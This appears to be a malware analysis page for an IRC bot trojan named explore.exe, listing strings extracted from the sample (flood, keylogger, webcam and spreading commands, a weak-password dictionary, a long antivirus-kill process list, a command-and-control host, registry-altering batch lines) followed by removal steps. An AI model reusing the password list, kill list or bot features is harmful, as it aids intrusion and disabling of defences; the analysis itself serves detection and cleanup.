Echo "DeadGWDetectDefault"=dword:00000001>>%temp%\1.reg
Echo "DontAddDefaultGatewayDefault"=dword:00000000>>%temp%\1.reg
Echo "EnableSecurityFilters"=dword:00000001>>%temp%\1.reg
Echo "AllowUnqualifiedQuery"=dword:00000000>>%temp%\1.reg
Echo "PrioritizeRecordData"=dword:00000001>>%temp%\1.reg
Echo "TCP1320Opts"=dword:00000003>>%temp%\1.reg
Echo "KeepAliveTime"=dword:00023280>>%temp%\1.reg
Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\1.reg
Echo "BcastNameQueryCount"=dword:00000001>>%temp%\1.reg
Echo "CacheTimeout"=dword:0000ea60>>%temp%\1.reg
Echo "Size/Small/Medium/Large"=dword:00000003>>%temp%\1.reg
Echo "LargeBufferSize"=dword:00001000>>%temp%\1.reg
Echo "SynAckProtect"=dword:00000002>>%temp%\1.reg
Echo "PerformRouterDiscovery"=dword:00000000>>%temp%\1.reg
Echo "EnablePMTUBHDetect"=dword:00000000>>%temp%\1.reg
Echo "FastSendDatagramThreshold "=dword:00000400>>%temp%\1.reg
Echo "StandardAddressLength "=dword:00000018>>%temp%\1.reg
Echo "DefaultReceiveWindow "=dword:00004000>>%temp%\1.reg
Echo "DefaultSendWindow"=dword:00004000>>%temp%\1.reg
Echo "BufferMultiplier"=dword:00000200>>%temp%\1.reg
Echo "PriorityBoost"=dword:00000002>>%temp%\1.reg
Echo "IrpStackSize"=dword:00000004>>%temp%\1.reg
Echo "IgnorePushBitOnReceives"=dword:00000000>>%temp%\1.reg
Echo "DisableAddressSharing"=dword:00000000>>%temp%\1.reg
Echo "AllowUserRawAccess"=dword:00000000>>%temp%\1.reg
Echo "DisableRawSecurity"=dword:00000000>>%temp%\1.reg
Echo "DynamicBacklogGrowthDelta"=dword:00000032>>%temp%\1.reg
Echo "FastCopyReceiveThreshold"=dword:00000400>>%temp%\1.reg
Echo "LargeBufferListDepth"=dword:0000000a>>%temp%\1.reg
Echo "MaxActiveTransmitFileCount"=dword:00000002>>%temp%\1.reg
Echo "MaxFastTransmit"=dword:00000040>>%temp%\1.reg
Echo "OverheadChargeGranularity"=dword:00000001>>%temp%\1.reg
Echo "SmallBufferListDepth"=dword:00000020>>%temp%\1.reg
Echo "SmallerBufferSize"=dword:00000080>>%temp%\1.reg
Echo "TransmitWorker"=dword:00000020>>%temp%\1.reg
Echo "DNSQueryTimeouts" =hex(7):31,00,00,00,32,00,00,00,32,00,00,00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\1.reg
Echo "DefaultRegistrationTTL"=dword:00000014>>%temp%\1.reg
Echo "DisableReplaceAddressesInConflicts"=dword:00000000>>%temp%\1.reg
Echo "DisableReverseAddressRegistrations"=dword:00000001>>%temp%\1.reg
Echo "UpdateSecurityLevel "=dword:00000000>>%temp%\1.reg
Echo "DisjointNameSpace"=dword:00000001>>%temp%\1.reg
Echo "QueryIpMatching"=dword:00000000>>%temp%\1.reg
Echo "NoNameReleaseOnDemand"=dword:00000001>>%temp%\1.reg
Echo "EnableDeadGWDetect"=dword:00000000>>%temp%\1.reg
Echo "EnableFastRouteLookup"=dword:00000001>>%temp%\1.reg
Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\1.reg
Echo "MaxHashTableSize"=dword:00000800>>%temp%\1.reg
Echo "SackOpts"=dword:00000001>>%temp%\1.reg
Echo "Tcp1323Opts"=dword:00000003>>%temp%\1.reg
Echo "TcpMaxDupAcks"=dword:00000001>>%temp%\1.reg
Echo "TcpRecvSegmentSize"=dword:00000585>>%temp%\1.reg
Echo "TcpSendSegmentSize"=dword:00000585>>%temp%\1.reg
Echo "TcpWindowSize"=dword:0007d200>>%temp%\1.reg
Echo "DefaultTTL"=dword:00000030>>%temp%\1.reg
Echo "TcpMaxHalfOpen"=dword:0000004b>>%temp%\1.reg
Echo "TcpMaxHalfOpenRetried"=dword:00000050>>%temp%\1.reg
Echo "TcpTimedWaitDelay"=dword:00000000>>%temp%\1.reg
Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\1.reg
Echo "FFPControlFlags"=dword:00000001>>%temp%\1.reg
Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\1.reg
Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\1.reg
Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\1.reg
Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\1.reg
Echo "EnablePMTUDiscovery"=dword:00000001>>%temp%\1.reg
Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\1.reg
Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]>>%temp%\1.reg
Echo "MaxConnectionsPer1_0Server"=dword:00000050>>%temp%\1.reg
Echo "MaxConnectionsPerServer"=dword:00000050>>%temp%\1.reg
START /WAIT REGEDIT /S %temp%\1.reg
DEL %temp%\1.reg
Not supported by this system.
Error getting ARP cache: <%d>.
Finished sending pings to %s.
Error sending pings to %s.
] (udp.p
Finished sending packets to %s.
PRIVMSG %s :%s
] (cmd.p
Failed to start IO thread, error: <%d>.
cmd.exe
Ý %dh %dm
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
%s (%s)
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
Failed to connect to HTTP server.
Invalid URL.
Failed to get requested URL from HTTP server.
URL visited.
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
Transfer complete to IP: %s, Filename: %s (%s bytes).
DCC SEND %s %i %i %i
Transfer complete from IP: %s, Filename: %s (%s bytes).
Bad URL, or DNS Error: %s.
Update failed: Error executing file: %s.
Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
Opened: %s.
Downloaded %.1f KB to %s @ %.1f KB/sec.
CRC Failed (%d != %d).
Filesize is incorrect: (%d != %d).
Update: %s (%dKB transferred).
File download: %s (%dKB transferred).
Couldn't open file: %s.
%s Drive (%s): %s total, %s free, %s available.
%s Drive (%s): Failed to stat, device not ready.
%s %s :%s
PRIVMSG
%s: No service specified.
Error with service: '%s'. %s
%s service: '%s'.
%s: %s (%s)
The following Windows services are registered:
%s: No share specified.
%s share: '%s'.
%s: Error with share: '%s'. %s
Share list error: %s <%ld>
%s: No username specified.
%s: Error with username: '%s'. %s
%s username: '%s'.
Units Per Week: %d
Max. Storage: %d
User's Language: %d
Country Code: %d
Workstations: %S
Logon Server: %S
Last Logoff: %d
Last Logon: %d
Number of Logins: %d
Bad Password Count: %d
Password Age: %d
Parameters: %S
Home Directory: %S
Auth Flags: %d
Privilege Level: %s
Comment: %S
User Comment: %S
Full Name: %S
Account: %S
Total users found: %d.
User list error: %s <%ld>
The password is shorter than required (or does not meet the password policy requirement.)
The operation is allowed only on the primary domain controller of the domain.
This network request is not supported.
%s <Server: %S> <Message: %S>
irc.kr3wzb4se.info
explore.exe
keys.txt
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
supported
windows95
windows98
windowsME
windows2k
WindowsXP
00000000
windows
webpage
supporte
support
smtp
report
passphra
operator
mickey
loginwor
keyword
keyin
keybord
asshole
mypass123
mypass
login
ihavenopass
passwd
88888888
11111111
123456789
12345678
1234567
PASSWORD
roffer v1.2b24 [20031215140650], hXXp://iroffer.org/
*@fbi.gov
Failed to start registry thread, error: <%d>.
Failed to start secure thread, error: <%d>.
Failed to start AV/FW killer thread, error: <%d>.
%s %d "%s"
Connected to %s.
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
%s system.
Failed to start flood thread, error: <%d>.
Flooding: (%s:%s) for %s seconds.
Uploading file: %s to: %s failed.
Uploading file: %s to: %s
PTF.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
File not found: %s.
web.PTF.ul
web.hcon
15 Message sent to %s.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
web.email
%s %s flooding: (%s:%s) for %s seconds.
rape.tf
ICMP.dll not available
Sending %d pings to %s. packet size: %d, timeout: %d(ms).
rape.pf
Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
rape.uf
%s Exploitation started on %s:%d waiting %d seconds for %d minutes using %d threads.
[%s] * %s %s
irc.clone.ac
[%s] <%s> %s
irc.clone.pm
Failed to start scan thread, error: <%d>.
Port scan started: %s:%d with delay: %d(ms).
root.ps
Failed to start redirection thread, error: <%d>.
TCP redirect created from: %s:%d to: %s:%d.
server.rd
Failed to start transfer thread, error: <%d>.
Downloading URL: %s to: %s.
web.dl.g
rape.sf
Failed to start clone thread, error: <%d>.
Created on %s:%d, in channel %s.
irc.clone.st
Flooding: (%s) for %s seconds.
rape.ic
Rename: '%s' to: '%s'.
sys.rn
Failed to start search thread, error: <%d>.
Searching for file: %s in: %s.
sys.ff
] (exec.p
Commands: %s
Couldn't execute file.
Failed to start download thread, error: <%d>.
Downloading update from: %s.
%s%s.exe
web.dl.up
irc.de
Repeat not allowed in command line: %s
Repeat: %s
irc.rp
PART %s
irc.clone.p
JOIN %s %s
irc.clone.j
Nick (%s): %s
irc.clone.ni
Mode (%s): %s
MODE %s
irc.clone.m
Raw (%s): %s
irc.clone.raw
Mode change: %s
irc.cy
Action: %s: %s.
ACTION %s
irc.ac
Privmsg: %s: %s.
irc.pm
Alias added: %s.
irc.aa
Gethost: %s.
Gethost: %s, Command: %s
%s %s %s :%s
irc.gh
Error while capturing amateur video from webcam.
Amateur video saved to: %s.
Invalid parameters for webcam capture.
Error while capturing from webcam.
Webcam capture saved to: %s.
Driver #%d - %s - %s.
Screen capture saved to: %s.
sys.cap
Failed to load advapi32.dll or netapi32.dll.
sys.net
.n.z.m. (keylog.p.l.g) .
. Failed to start logging thread, error: <%d>.
. Key logger active.
. No key logger thread found.
. Key logger stopped. (%d thread(s) stopped.)
sys.kl
Carnivore stopped. (%d thread(s) stopped.)
Failed to start sniffer thread, error: <%d>.
Read file failed: %s
Read file complete: %s
sys.rf
sys.cmd
mirc.cmd
Failed to start connection thread, error: <%d>.
URL: %s.
web.v
List: %s
sys.fl
Send File: %s, User: %s.
mirc.dcc.get
Deleted '%s'.
sys.del
Failed to terminate process ID: %s
Process killed ID: %s
sys.kpid
Failed to terminate process: %s
Process killed: %s
sys.kpn
Lookup: %s -> %s.
irc.dns
Server changed to: '%s'.
irc.se
15 Couldn't open file: %s
15 File opened: %s
Prefix changed to: '%c'.
irc.pr
irc.clone.rn
irc.clone.q
Failed to kill thread: %s.
Killed thread: %s.
Stopped: %d thread(s).
irc.tk
IRC Raw: %s.
irc.raw
Parted channel: '%s'.
irc.pt
Joined channel: '%s'.
Nick changed to: '%s'.
Failed to start scan, port is invalid.
%s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
Already %d scanning threads. Too many specified.
root.mass
Failed to start server thread, error: <%d>.
server.tf.on
server.web.on
root.cip
Failed to load dnsapi.dll.
irc.fdns
irc.farp
com.gc
com.getclip
Login list complete.
%d. %s
-[Login List]-
irc.who
[CMD]
sys.cmd.off
sys.cmd.on
sys.dll
sys.di
Uptime: %s.
sys.up
] (cdkeys.p
sys.key
Failed to start listing thread, error: <%d>.
sys.ps.on
irc.rmb
sys.si
Failed to start flood thread, error: <%d>.
Flooding: (%s:%s) for %s seconds.
rape.ssf
sys.ni
irc.clg
irc.lg.on
irc.al
Failed to start list thread, error: <%d>.
irc.tl
Bot ID: %s.
irc.id
Status: Ready. Bot Uptime: %s.
irc.st
QUIT :%s
irc.dc
irc.rc
root.st
root.stats
root.stop
sys.ld.stop
irc.clone.off
sys.ps.off
sys.ff.off
server.tf.off
rape.pf.off
UDP flood
rape.uf.off
rape.sf.off
rape.df.off
TCP redirect
server.rd.off
irc.lg.off
server.web.off
server.s4.off
server.s4.on
ld.off
sys.ld.off
ld.on
sys.ld.on
irc.ver
Invalid login slot number: %d.
No user logged in at slot: %d.
irc.lo
irc.di
Random nick change: %s
irc.rn
$rndnick
User: %s logged in.
Password accepted.
*Failed host auth by: (%s!%s).
*Failed pass auth by: (%s!%s).
NOTICE %s :You've been logged.
NOTICE %s :Nice try, idiot. (%s!%s).
irc.li
Chat failed by unauthorized user: %s.
Chat already active with user: %s.
Failed to start chat thread, error: <%d>.
Chat from user: %s.
Receive file: '%s' failed from unauthorized user: %s.
NOTICE %s :
PING %s
%s has just versioned me.
VERSION %s
Receive file: '%s' from user: %s.
User: %s logged out.
Joined channel: %s.
:%s%s
NICK
NOTICE %s :%s
User %s logged out.
PONG %s
i11r54n4.exe
irun4.exe
d3dupdate.exe
rate.exe
ssate.exe
winsys.exe
winupd.exe
SysMonXP.exe
bbeagle.exe
Penis32.exe
mscvb32.exe
sysinfo.exe
PandaAVEngine.exe
F-AGOBOT.EXE
HIJACKTHIS.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE
ZONALM2601.EXE
ZATUTOR.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
XPF202EN.EXE
WYVERNWORKSFIREWALL.EXE
WUPDT.EXE
WUPDATER.EXE
WSBGATE.EXE
WRCTRL.EXE
WRADMIN.EXE
WNT.EXE
WNAD.EXE
WKUFIND.EXE
WINUPDATE.EXE
WINTSK32.EXE
WINSTART001.EXE
WINSTART.EXE
WINSSK32.EXE
WINSERVN.EXE
WINRECON.EXE
WINPPR32.EXE
WINNET.EXE
WINMAIN.EXE
WINLOGIN.EXE
WININITX.EXE
WININIT.EXE
WININETD.EXE
WINDOWS.EXE
WINDOW.EXE
WINACTIVE.EXE
WIN32US.EXE
WIN32.EXE
WIN-BUGSFIX.EXE
WIMMUN32.EXE
WHOSWATCHINGME.EXE
WGFE95.EXE
WFINDV32.EXE
WEBTRAP.EXE
WEBSCANX.EXE
WEBDAV.EXE
WATCHDOG.EXE
W9X.EXE
W32DSM89.EXE
VSWINPERSE.EXE
VSWINNTSE.EXE
VSWIN9XE.EXE
VSSTAT.EXE
VSMON.EXE
VSMAIN.EXE
VSISETUP.EXE
VSHWIN32.EXE
VSECOMR.EXE
VSCHED.EXE
VSCENU6.02D30.EXE
VSCAN40.EXE
VPTRAY.EXE
VPFW30S.EXE
VPC42.EXE
VPC32.EXE
VNPC3000.EXE
VNLAN300.EXE
VIRUSMDPERSONALFIREWALL.EXE
VIR-HELP.EXE
VFSETUP.EXE
VETTRAY.EXE
VET95.EXE
VET32.EXE
VCSETUP.EXE
VBWINNTW.EXE
VBWIN9X.EXE
VBUST.EXE
VBCONS.EXE
VBCMSERV.EXE
UTPOST.EXE
UPGRAD.EXE
UPDATE.EXE
UPDAT.EXE
UNDOBOOT.EXE
TVTMD.EXE
TVMD.EXE
TSADBOT.EXE
TROJANTRAP3.EXE
TRJSETUP.EXE
TRJSCAN.EXE
TRICKLER.EXE
TRACERT.EXE
TITANINXP.EXE
TITANIN.EXE
TGBOB.EXE
TFAK5.EXE
TFAK.EXE
TEEKIDS.EXE
TDS2-NT.EXE
TDS2-98.EXE
TDS-3.EXE
TCM.EXE
TCA.EXE
TC.EXE
TBSCAN.EXE
TAUMON.EXE
TASKMON.EXE
TASKMO.EXE
TASKMG.EXE
SYSUPD.EXE
SYSTEM32.EXE
SYSTEM.EXE
SYSEDIT.EXE
SYMTRAY.EXE
SYMPROXYSVC.EXE
SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE
SWEEP95.EXE
SVSHOST.EXE
SVCHOSTS.EXE
SVCHOSTC.EXE
SVC.EXE
SUPPORTER5.EXE
SUPPORT.EXE
SUPFTRL.EXE
STCLOADER.EXE
START.EXE
ST2.EXE
SSG_4104.EXE
SSGRATE.EXE
SS3EDIT.EXE
SRNG.EXE
SREXE.EXE
SPYXX.EXE
SPOOLSV32.EXE
SPOOLCV.EXE
SPOLER.EXE
SPHINX.EXE
SPF.EXE
SPERM.EXE
SOFI.EXE
SOAP.EXE
SMSS32.EXE
SMS.EXE
SMC.EXE
SHOWBEHIND.EXE
SHN.EXE
SHELLSPYINSTALL.EXE
SH.EXE
SGSSFW32.EXE
SFC.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SERVLCES.EXE
SERVLCE.EXE
SERVICE.EXE
SERV95.EXE
SD.EXE
SCVHOST.EXE
SCRSVR.EXE
SCRSCAN.EXE
SCANPM.EXE
SCAN95.EXE
SCAN32.EXE
SCAM32.EXE
SC.EXE
SBSERV.EXE
SAVENOW.EXE
SAVE.EXE
SAHAGENT.EXE
SAFEWEB.EXE
RUXDLL32.EXE
RUNDLL16.EXE
RUNDLL.EXE
RUN32DLL.EXE
RULAUNCH.EXE
RTVSCN95.EXE
RTVSCAN.EXE
RSHELL.EXE
RRGUARD.EXE
RESCUE32.EXE
RESCUE.EXE
REGEDT32.EXE
REGEDIT.EXE
REGED.EXE
REALMON.EXE
RCSYNC.EXE
RB32.EXE
RAY.EXE
RAV8WIN32ENG.EXE
RAV7WIN.EXE
RAV7.EXE
RAPAPP.EXE
QSERVER.EXE
QCONSOLE.EXE
PVIEW95.EXE
PUSSY.EXE
PURGE.EXE
PSPF.EXE
PROTECTX.EXE
PROPORT.EXE
PROGRAMAUDITOR.EXE
PROCEXPLORERV1.0.EXE
PROCESSMONITOR.EXE
PROCDUMP.EXE
PRMVR.EXE
PRMT.EXE
PRIZESURFER.EXE
PPVSTOP.EXE
PPTBC.EXE
PPINUPDT.EXE
POWERSCAN.EXE
PORTMONITOR.EXE
PORTDETECTIVE.EXE
POPSCAN.EXE
POPROXY.EXE
POP3TRAP.EXE
PLATIN.EXE
PINGSCAN.EXE
PGMONITR.EXE
PFWADMIN.EXE
PF2.EXE
PERSWF.EXE
PERSFW.EXE
PERISCOPE.EXE
PENIS.EXE
PDSETUP.EXE
PCSCAN.EXE
PCIP10117_0.EXE
PCFWALLICON.EXE
PCDSETUP.EXE
PCCWIN98.EXE
PCCWIN97.EXE
PCCNTMON.EXE
PCCIOMON.EXE
PCC2K_76_1436.EXE
PCC2002S902.EXE
PAVW.EXE
PAVSCHED.EXE
PAVPROXY.EXE
PAVCL.EXE
PATCH.EXE
PANIXK.EXE
PADMIN.EXE
OUTPOSTPROINSTALL.EXE
OUTPOSTINSTALL.EXE
OUTPOST.EXE
OTFIX.EXE
OSTRONET.EXE
OPTIMIZE.EXE
ONSRVR.EXE
OLLYDBG.EXE
NWTOOL16.EXE
NWSERVICE.EXE
NWINST4.EXE
NVSVC32.EXE
NVC95.EXE
NVARCH16.EXE
NUPGRADE.EXE
NUI.EXE
NTXconfig.EXE
NTVDM.EXE
NTRTSCAN.EXE
NT.EXE
NSUPDATE.EXE
NSTASK32.EXE
NSSYS32.EXE
NSCHED32.EXE
NPSSVC.EXE
NPSCHECK.EXE
NPROTECT.EXE
NPFMESSENGER.EXE
NPF40_TW_98_NT_ME_2K.EXE
NOTSTART.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NORMIST.EXE
NOD32.EXE
NMAIN.EXE
NISUM.EXE
NISSERV.EXE
NETUTILS.EXE
NETSTAT.EXE
NETSPYHUNTER-1.2.EXE
NETSCANPRO.EXE
NETMON.EXE
NETINFO.EXE
NETD32.EXE
NETARMOR.EXE
NEOWATCHLOG.EXE
NEOMONITOR.EXE
NDD32.EXE
NCINST4.EXE
NC2000.EXE
NAVWNT.EXE
NAVW32.EXE
NAVSTUB.EXE
NAVNT.EXE
NAVLU32.EXE
NAVENGNAVEX15.NAVLU32.EXE
NAVDX.EXE
NAVAPW32.EXE
NAVAPSVC.EXE
NAVAP.NAVAPSVC.EXE
AUTO-PROTECT.NAV80TRY.EXE
NAV.EXE
N32SCANW.EXE
MWATCH.EXE
MU0311AD.EXE
MSVXD.EXE
MSSYS.EXE
MSSMMC32.EXE
MSMSGRI32.EXE
MSMGT.EXE
MSLAUGH.EXE
MSINFO32.EXE
MSIEXEC16.EXE
MSDOS.EXE
MSDM.EXE
MSCONFIG.EXE
MSCMAN.EXE
MSCCN32.EXE
MSCACHE.EXE
MSBLAST.EXE
MSBB.EXE
MSAPP.EXE
MRFLUX.EXE
MPFTRAY.EXE
MPFSERVICE.EXE
MPFAGENT.EXE
MOSTAT.EXE
MOOLIVE.EXE
MONITOR.EXE
MMOD.EXE
MINILOG.EXE
MGUI.EXE
MGHTML.EXE
MGAVRTE.EXE
MGAVRTCL.EXE
MFWENG3.02D30.EXE
MFW2EN.EXE
MFIN32.EXE
MD.EXE
MCVSSHLD.EXE
MCVSRTE.EXE
MCUPDATE.EXE
MCTOOL.EXE
MCSHIELD.EXE
MCMNHDLR.EXE
MCAGENT.EXE
MAPISVC32.EXE
LUSPT.EXE
LUINIT.EXE
LUCOMSERVER.EXE
LUAU.EXE
LUALL.EXE
LSETUP.EXE
LORDPE.EXE
LOOKOUT.EXE
LOCKDOWN2000.EXE
LOCKDOWN.EXE
LOCALNET.EXE
LOADER.EXE
LNETINFO.EXE
LDSCAN.EXE
LDPROMENU.EXE
LDPRO.EXE
LDNETMON.EXE
LAUNCHER.EXE
KILLPROCESSSETUP161.EXE
KERNEL32.EXE
KERIO-WRP-421-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-PF-213-EN-WIN.EXE
KEENVALUE.EXE
KAZZA.EXE
KAVPF.EXE
KAVPERS40ENG.EXE
KAVLITE40ENG.EXE
JEDI.EXE
JDBGMRG.EXE
JAMMER.EXE
ISTSVC.EXE
ISRV95.EXE
ISASS.EXE
IRIS.EXE
IPARMOR.EXE
IOMON98.EXE
INTREN.EXE
INTDEL.EXE
INIT.EXE
INFWIN.EXE
INFUS.EXE
INETLNFO.EXE
IFW2000.EXE
IFACE.EXE
IEXPLORER.EXE
IEDRIVER.EXE
IEDLL.EXE
IDLE.EXE
ICSUPPNT.EXE
ICSUPP95.EXE
ICMON.EXE
ICLOADNT.EXE
ICLOAD95.EXE
IBMAVSP.EXE
IBMASN.EXE
IAMSTATS.EXE
IAMSERV.EXE
IAMAPP.EXE
HXIUL.EXE
HXDL.EXE
HWPE.EXE
HTPATCH.EXE
HTLOG.EXE
HOTPATCH.EXE
HOTACTIO.EXE
HBSRV.EXE
HBINST.EXE
HACKTRACERSETUP.EXE
GUARDDOG.EXE
GUARD.EXE
GMT.EXE
GENERICS.EXE
GBPOLL.EXE
GBMENU.EXE
GATOR.EXE
FSMB32.EXE
FSMA32.EXE
FSM32.EXE
FSGK32.EXE
FSAV95.EXE
FSAV530WTBYB.EXE
FSAV530STBYB.EXE
FSAV32.EXE
FSAV.EXE
FSAA.EXE
FRW.EXE
FPROT.EXE
FP-WIN_TRIAL.EXE
FP-WIN.EXE
FNRB32.EXE
FLOWPROTECTOR.EXE
FIREWALL.EXE
FINDVIRU.EXE
FIH32.EXE
FCH32.EXE
FAST.EXE
FAMEH32.EXE
F-STOPW.EXE
F-PROT95.EXE
F-PROT.EXE
F-AGNT95.EXE
EXPLORE.EXE
EXPERT.EXE
EXE.AVXW.EXE
EXANTIVIRUS-CNET.EXE
EVPN.EXE
ETRUSTCIPE.EXE
ETHEREAL.EXE
ESPWATCH.EXE
ESCANV95.EXE
ESCANHNT.EXE
ESCANH95.EXE
ESAFE.EXE
ENT.EXE
EMSW.EXE
EFPEADM.EXE
ECENGINE.EXE
DVP95_0.EXE
DVP95.EXE
DSSAGENT.EXE
DRWEBUPW.EXE
DRWEB32.EXE
DRWATSON.EXE
DPPS2.EXE
DPFSETUP.EXE
DPF.EXE
DOORS.EXE
DLLREG.EXE
DLLCACHE.EXE
DIVX.EXE
DEPUTY.EXE
DEFWATCH.EXE
DEFSCANGUI.EXE
DEFALERT.EXE
DCOMX.EXE
DATEMANAGER.EXE
Claw95.EXE
CWNTDWMO.EXE
CWNB181.EXE
CV.EXE
CTRL.EXE
CPFNT206.EXE
CPF9X206.EXE
CPD.EXE
CONNECTIONMONITOR.EXE
CMON016.EXE
CMGRDIAN.EXE
CMESYS.EXE
CMD32.EXE
CLICK.EXE
CLEANPC.EXE
CLEANER3.EXE
CLEANER.EXE
CLEAN.EXE
CLAW95CF.EXE
CFINET32.EXE
CFINET.EXE
CFIAUDIT.EXE
CFIADMIN.EXE
CFGWIZ.EXE
CFD.EXE
CDP.EXE
CCPXYSVC.EXE
CCEVTMGR.EXE
CCAPP.EXE
BVT.EXE
BUNDLE.EXE
BS120.EXE
BRASIL.EXE
BPC.EXE
BORG2.EXE
BOOTWARN.EXE
BOOTCONF.EXE
BLSS.EXE
BLACKICE.EXE
BLACKD.EXE
BISP.EXE
BIPCPEVALSETUP.EXE
BIPCP.EXE
BIDSERVER.EXE
BIDEF.EXE
BELT.EXE
BEAGLE.EXE
BD_PROFESSIONAL.EXE
BARGAINS.EXE
BACKWEB.EXE
AVXQUAR.EXE
AVXMONITORNT.EXE
AVXMONITOR9X.EXE
AVWUPSRV.EXE
AVWUPD32.EXE
AVWUPD.EXE
AVWINNT.EXE
AVWIN95.EXE
AVSYNMGR.EXE
AVSCHED32.EXE
AVPUPD.EXE
AVPTC32.EXE
AVPM.EXE
AVPDOS32.EXE
AVPCC.EXE
AVP32.EXE
AVP.EXE
AVNT.EXE
AVLTMAIN.EXE
AVKWCTl9.EXE
AVKSERVICE.EXE
AVKSERV.EXE
AVKPOP.EXE
AVGW.EXE
AVGUARD.EXE
AVGSERV9.EXE
AVGSERV.EXE
AVGNT.EXE
AVGCTRL.EXE
AVGCC32.EXE
AVE32.EXE
AVCONSOL.EXE
AUTOUPDATE.EXE
AUTOTRACE.EXE
AUTODOWN.EXE
AUPDATE.EXE
AU.EXE
ATWATCH.EXE
ATUPDATER.EXE
ATRO55EN.EXE
ATGUARD.EXE
ATCON.EXE
ARR.EXE
APVXDWIN.EXE
APLICA32.EXE
APIMONITOR.EXE
ANTS.EXE
ANTIVIRUS.EXE
ANTI-TROJAN.EXE
AMON9X.EXE
ALOGSERV.EXE
ALEVIR.EXE
ALERTSVC.EXE
AGENTW.EXE
AGENTSVR.EXE
ADVXDWIN.EXE
ADAWARE.EXE
ACKWIN32.EXE
%s (%d)
[%s]|
[%d]%s
IP: %s Port: %d is open.
Scanning IP: %s, Port: %d.
Netapi32.dll couldn't be loaded.
Failed to delete '%S' share.
Share '%S' deleted.
Failed to delete '%s' share.
Share '%s' deleted.
Advapi32.dll couldn't be loaded.
Failed to open IPC$ Restriction registry key.
Failed to open DCOM registry key.
Failed to add '%s' share.
Share '%s' added.
Failed to open IPC$ restriction registry key.
tPTF.exe -i get
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
zcÁ
[04-12-2015 06:36:53]
[04-12-2015 06:36:52]
[04-12-2015 06:36:51]
%System%\explore.exe
TransactNamedPipe
PeekNamedPipe
CreatePipe
GetCPInfo
.text
`.rdata
@.data
.sxdata
4]!.nt
.LfJ2O0
KERNEL32.DLL
WS2_32.dll
\C$\123456111111111111111.doc
Windows 2000 2195
Windows 2000 5.0
\\192.168.1.210\IPC$
\PIPE\
explore.exe_464_rwx_00851000_0001B000:
h.dllhel32hkernT
GWSSh
%S;Dl
]%DU,9
=G;.TS
\V\f%X
x.yVVm
FtPF
*H.tM
0.xo;
T / HTTP/1.0
Host: %s
__GLOBAL_HEAP_SELECTED.MSVCRT
c%d`od
%iKB/sec).oSend8
g: <%d>.
. P%Dt"dR
v.DEL
keyA
m%}[%d-
X9ll1.Chang
.auth
! .id
!.hashin!B
CDKey JO
.PASSF.
L/_.com
.COM/Set-Cookie:
\pipe\epmap
Dne/p.dllw
6.ipc_
3456789
dPORT
W21NzmxFtpd0SY/
RIVMSG
lv{_A?.dPHUrlA'
Lo%up
xia.nC
HKEY_LOC
iTcpip
qoudp
5SURLn
i.dlKc
.kr3wzb4
://iQ.CX
.ZQRz
h-.OS*%
.HAG3T
4]!.nt
.LfJ2O0
KERNEL32.DLL
WS2_32.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
explore.exe:1452
%original file name%.exe:1808
regedit.exe:640 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\a.bat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\5UP6LBPK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PX0R9ZUJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S8PZTGPI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\JB2UPCO0\desktop.ini (67 bytes)
%System%\explore.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\explore.exe (2712 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"1337 virus" = "explore.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"1337 virus" = "explore.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\" - Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
